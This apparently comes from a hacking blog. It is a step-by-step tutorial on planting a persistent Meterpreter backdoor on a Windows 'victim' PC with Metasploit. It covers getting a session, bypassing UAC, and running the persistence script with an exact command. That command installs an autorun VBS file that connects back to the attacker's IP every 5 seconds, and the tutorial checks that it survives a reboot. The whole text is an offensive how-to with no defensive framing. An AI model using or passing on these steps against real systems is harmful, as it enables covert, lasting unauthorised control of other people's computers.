Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.
The answer is "Yes!" How? Let's find out.
Persistence creates a backdoor that tries to connect back to the attacker's Metasploit instance, and the connect-back happens at system boot or user logon.
You can also configure the time between connect-back attempts, in case the attacker machine is not currently up and you want the backdoor to keep trying to connect to you. As for how it works: under the hood, persistence creates a VBS script on the victim system and adds it to the appropriate registry key so that it autoruns.
To get system-level or admin privileges, we have to execute it as admin, which is monitored by Windows UAC.
This tutorial assumes that you already have Metasploit installed, or that you are running Kali / BackTrack Linux. If it is not installed, you can download it from https://www.metasploit.com/
Step 1 : First, get a Meterpreter session on the victim PC and get admin privileges on the victim PC using bypassuac.
How To Bypass UAC And Get Admin Privilege in Windows Using MetaSploit.
Step 2 : We now have a full Meterpreter shell on the target. Now that the session has opened, type sysinfo to get system information.
Step 3 : Just type help to see more actions.
Step 4 : Type exit and run the persistence script
Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victim's system. First, let's take a look at the options that are available when we run this script by using the -h switch.
meterpreter > run persistence -h
Step 5 : Type the command
meterpreter > run persistence -U -i 5 -p 4466 -r 192.168.18.132
This command runs the persistence script, which checks every 5 seconds for a connection (-i 5), connects on port 4466 (-p 4466), and connects to the local system (ours) on IP address 192.168.18.132 (-r 192.168.18.132).
The .vbs file is successfully saved on the victim PC.
Opening a Second Session
We can see that we have opened a Meterpreter session on the victim system.
Step 6 : Now it's time to check whether the backdoor opens a new session for us every time the system boots. So we will reboot the system.
Windows is shutting down
All sessions are automatically closed.
Step 7 : Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 5 seconds until it has successfully opened a session for us.
Step 8 : Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again.
Step 9 : Now check the open sessions.